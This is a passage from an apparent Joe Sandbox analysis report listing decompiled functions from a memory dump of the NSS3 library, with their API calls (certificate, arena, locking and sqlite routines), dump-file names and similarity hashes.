PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDFAA

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 66ed36b52dbee3c23072f9d31331926ec8d5be0dd8e0637e8489e27d54c854e0
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: 54819F716467078BFB148E1DCC903697696DB61388F22883AD919CAFE1D774E484CE2E

Function 6C5B3C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C5B3C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6C5B3C94

Part of subcall function 6C5A95B0: TlsGetValue.KERNEL32(00000000,?,6C5C00D2,00000000), ref: 6C5A95D2
Part of subcall function 6C5A95B0: EnterCriticalSection.KERNEL32(?,?,?,6C5C00D2,00000000), ref: 6C5A95E7
Part of subcall function 6C5A95B0: PR_Unlock.NSS3(?,?,?,?,6C5C00D2,00000000), ref: 6C5A9605

PORT_NewArena_Util.NSS3(00000800), ref: 6C5B3CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C5B3CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C5B3CE1

Part of subcall function 6C5B3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5CAE42), ref: 6C5B30AA
Part of subcall function 6C5B3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5B30C7
Part of subcall function 6C5B3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5B30E5
Part of subcall function 6C5B3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5B3116
Part of subcall function 6C5B3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5B312B
Part of subcall function 6C5B3090: PK11_DestroyObject.NSS3(?,?), ref: 6C5B3154
Part of subcall function 6C5B3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B317E

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: 25f703742c6ac03d91444aaef86e515a18b083017ec7a64862defc1d3938ab9a
Instruction ID: 2524ffa63a838b928ae0eda183e66dd4ebd63d260ca3696efef3b03f566f6922
Opcode Fuzzy Hash: 25f703742c6ac03d91444aaef86e515a18b083017ec7a64862defc1d3938ab9a
Instruction Fuzzy Hash: 9B61B571A00200ABEF105F65DC51FAB7AA9AF48748F484429FD05BAA52FB31D918C7A5

Function 6C5F3D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6C5F3440: PK11_GetAllTokens.NSS3 ref: 6C5F3481
Part of subcall function 6C5F3440: PR_SetError.NSS3(00000000,00000000), ref: 6C5F34A3
Part of subcall function 6C5F3440: TlsGetValue.KERNEL32 ref: 6C5F352E
Part of subcall function 6C5F3440: EnterCriticalSection.KERNEL32(?), ref: 6C5F3542
Part of subcall function 6C5F3440: PR_Unlock.NSS3(?), ref: 6C5F355B

TlsGetValue.KERNEL32 ref: 6C5F3D8B
EnterCriticalSection.KERNEL32(?), ref: 6C5F3D9F
PR_Unlock.NSS3(?), ref: 6C5F3DCA
PR_SetError.NSS3(00000000,00000000), ref: 6C5F3DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C5F3E4F

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

TlsGetValue.KERNEL32 ref: 6C5F3E97
EnterCriticalSection.KERNEL32(?), ref: 6C5F3EAB
PR_Unlock.NSS3(?), ref: 6C5F3ED6
PR_SetError.NSS3(00000000,00000000), ref: 6C5F3EEE

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: c4a72696b52632be9dde49750a636380e534f2121eb1a1e16f0eb5dc22b684c9
Instruction ID: fe2f9ef1cb374341e69a4e792848a83383fedf60132d562829392a869eaab429
Opcode Fuzzy Hash: c4a72696b52632be9dde49750a636380e534f2121eb1a1e16f0eb5dc22b684c9
Instruction Fuzzy Hash: 51512876A002009BFB15AF69DC8476A77B4EF45318F044568DE2987B12EB31E855CFD2

Function 6C5A2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(ACC204B4), ref: 6C5A2C5D

Part of subcall function 6C600D30: calloc.MOZGLUE ref: 6C600D50
Part of subcall function 6C600D30: TlsGetValue.KERNEL32 ref: 6C600D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C5A2C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5A2CE0

Part of subcall function 6C5A2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C5A2CDA,?,00000000), ref: 6C5A2E1E
Part of subcall function 6C5A2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C5A2E33
Part of subcall function 6C5A2E00: TlsGetValue.KERNEL32 ref: 6C5A2E4E
Part of subcall function 6C5A2E00: EnterCriticalSection.KERNEL32(?), ref: 6C5A2E5E
Part of subcall function 6C5A2E00: PL_HashTableLookup.NSS3(?), ref: 6C5A2E71
Part of subcall function 6C5A2E00: PL_HashTableRemove.NSS3(?), ref: 6C5A2E84
Part of subcall function 6C5A2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C5A2E96
Part of subcall function 6C5A2E00: PR_Unlock.NSS3 ref: 6C5A2EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A2D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C5A2D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C5A2D3F
free.MOZGLUE(00000000), ref: 6C5A2D73
CERT_DestroyCertificate.NSS3(?), ref: 6C5A2DB8
free.MOZGLUE ref: 6C5A2DC8

Part of subcall function 6C5A3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A3EC2
Part of subcall function 6C5A3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5A3ED6
Part of subcall function 6C5A3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5A3EEE
Part of subcall function 6C5A3E60: PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A3F02
Part of subcall function 6C5A3E60: PL_FreeArenaPool.NSS3 ref: 6C5A3F14
Part of subcall function 6C5A3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5A3F27

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 97e4b3b62b3f74b9a92e2f365c2009df81efda19692e70521d9508c3f0dcd503
Instruction ID: b62818a245d52610acf25a949f4bc1b8792be6edbcf833f74c929559e39de9f0
Opcode Fuzzy Hash: 97e4b3b62b3f74b9a92e2f365c2009df81efda19692e70521d9508c3f0dcd503
Instruction Fuzzy Hash: AD51D071604211ABDB10DFA7DC86B5F7BE5EF94308F14082CE85983A52E731E817CB92

Function 6C5A7CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5A40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C5A3F7F,?,00000055,?,?,6C5A1666,?,?), ref: 6C5A40D9
Part of subcall function 6C5A40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C5A1666,?,?), ref: 6C5A40FC
Part of subcall function 6C5A40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C5A1666,?,?), ref: 6C5A4138

PR_GetCurrentThread.NSS3 ref: 6C5A7CFD

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6C6C9030), ref: 6C5A7D1B

Part of subcall function 6C5FFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C5A1A3E,00000048,00000054), ref: 6C5FFD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6C6C9048), ref: 6C5A7D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C5A7D50
PR_GetCurrentThread.NSS3 ref: 6C5A7D61
PORT_ArenaMark_Util.NSS3(?), ref: 6C5A7D7D
free.MOZGLUE(?), ref: 6C5A7D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C5A7DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C5A7E19

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: e1b3251d999dee5ad1d52d7fbcc28d0aa7e937e5748dc19a19b24f0dfd115ac2
Instruction ID: 9fb4db8942999a18b92bb02bc06a9ec56614619bb6684c0dbe6552863cb6241b
Opcode Fuzzy Hash: e1b3251d999dee5ad1d52d7fbcc28d0aa7e937e5748dc19a19b24f0dfd115ac2
Instruction Fuzzy Hash: 6F41C672A001199BDB008FAA9C41BAF37E4AF9129CF050564EC15ABB55E730ED1ACBA5

Function 6C5B7EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6C5B80DD), ref: 6C5B7F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C5B80DD), ref: 6C5B7F36
free.MOZGLUE(?,?,?,6C5B80DD), ref: 6C5B7F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C5B80DD), ref: 6C5B7F5D
DeleteCriticalSection.KERNEL32(?,6C5B80DD), ref: 6C5B7F94
free.MOZGLUE(?), ref: 6C5B7F9B
PR_SetError.NSS3(FFFFE08B,00000000,6C5B80DD), ref: 6C5B7FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C5B80DD), ref: 6C5B7FE6
free.MOZGLUE(?,6C5B80DD), ref: 6C5B802D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: 8aa2d630fea73995817011b96c29ba049efbddd3ad143fd36056f8472394ea3b
Instruction ID: d082d8815ecfc5a75c1fe8b181697c7496a36502d870d85dfe5f2b95f7569b3d
Opcode Fuzzy Hash: 8aa2d630fea73995817011b96c29ba049efbddd3ad143fd36056f8472394ea3b
Instruction Fuzzy Hash: 4D4119F2B051009BDB10DFB99C89A4A7BB5AB873D8F14023DE516A7B41DF30D809CBA5

Function 6C5FFEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5FFF00

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6C5FFF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C5FFF26
PORT_ArenaMark_Util.NSS3(?), ref: 6C5FFF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5FFF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C5FFF8C

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: 0757effd61fbaf56a3ab9227aee25e5703778d647cca76054a31c81da8daec8d
Instruction ID: 5d575b232471500adb7db1df0392c85ed5c0e2cfe536d67436e74b406b7529e0
Opcode Fuzzy Hash: 0757effd61fbaf56a3ab9227aee25e5703778d647cca76054a31c81da8daec8d
Instruction Fuzzy Hash: 8E3144B2A013129BF7148F588C40B9B76E8AF4634CF144238ED29A7F40EB31D915CBE9

Function 6C603CA0 Relevance: 13.6, APIs: 9, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C6038BD), ref: 6C603CBE
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C6038BD), ref: 6C603CD1

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C6038BD), ref: 6C603CF0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C6DB369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6C6038BD), ref: 6C603D0B
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6C6038BD), ref: 6C603D1A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C6DB369,000000FF,00000000,00000000,00000000,6C6038BD), ref: 6C603D38
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6C603D47
free.MOZGLUE(00000000), ref: 6C603D62
free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6C6038BD), ref: 6C603D6F

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
String ID:
API String ID: 2345246809-0
Opcode ID: a9c358f945a4eb52bf1606839a0da63e25d046eb502e462774c3a73e095b6e96
Instruction ID: c94c2ff9b161e919d35d5e7b68fd9d94eef0964e16b2eac6914f795f6cf6732b
Opcode Fuzzy Hash: a9c358f945a4eb52bf1606839a0da63e25d046eb502e462774c3a73e095b6e96
Instruction Fuzzy Hash: E52108B570111237FB20667B5D59E7B39EDDF827A9F140235B939E7AC0EA60D800C2B9

Function 6C547D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C547EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C547F2E

Strings

%s at line %d of [%.10s], xrefs: 6C547EE7, 6C547F28
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C547ED8, 6C547F08, 6C547F19
database corruption, xrefs: 6C547EE2, 6C547F23

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 228ba9411778a819a7327fb9bbaa2d7a37570207669a7c50fb207669ec8d5352
Instruction ID: 51af5abd4a427d5c564df0c6882e0530e46d5f79ffe9ae47f9901e5dd40be057
Opcode Fuzzy Hash: 228ba9411778a819a7327fb9bbaa2d7a37570207669a7c50fb207669ec8d5352
Instruction Fuzzy Hash: 7A61C170A042059FDB05CF25CC80FAA37B2BF85348F1589A9EC095BB52D731EC66CBA5

Function 6C52FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52FD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52FD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52FE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52FE83

Part of subcall function 6C52FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C52FEFA
Part of subcall function 6C52FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C52FF3B

Strings

%s at line %d of [%.10s], xrefs: 6C52FD73, 6C52FE35
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52FD64, 6C52FE26
database corruption, xrefs: 6C52FD6E, 6C52FE30

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: 341f6b5f9c70365e8e0856d326761a121268e223e7c41ab85b180933c151275b
Instruction ID: bd44b7d5005860a63d24b8f1fc5ef8cb52e0a3f8691fca6be519a930cbcfeda1
Opcode Fuzzy Hash: 341f6b5f9c70365e8e0856d326761a121268e223e7c41ab85b180933c151275b
Instruction Fuzzy Hash: AD518F71A00215DFDB04CFA9E890AAEB7F1FF48308F144169E905AB792E735EC51CBA4

Function 6C672F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C672FFD
sqlite3_initialize.NSS3 ref: 6C673007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C673032
sqlite3_mprintf.NSS3(6C6DAAF9,?), ref: 6C673073
sqlite3_free.NSS3(?), ref: 6C6730B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C6730C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C6730BB

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: d7bd2ae887a19dea170311d01e4419514c8e33ef26aed3643925db9ac9c15869
Instruction ID: 07c441ae2d2e0465ce7ff6e704effdbc13a8acfdf02b2560d820125fefcee313
Opcode Fuzzy Hash: d7bd2ae887a19dea170311d01e4419514c8e33ef26aed3643925db9ac9c15869
Instruction Fuzzy Hash: 7441C271600606EBDB10CF25D844A8AB7E5FF84368F148A38EC5987B40E731F995CBE4

Function 6C5F5ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]_l), ref: 6C5F5F0A
TlsGetValue.KERNEL32 ref: 6C5F5F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6C5F5F2F
PR_Unlock.NSS3(890008E8), ref: 6C5F5F55
PR_SetError.NSS3(00000000,00000000), ref: 6C5F5F6D
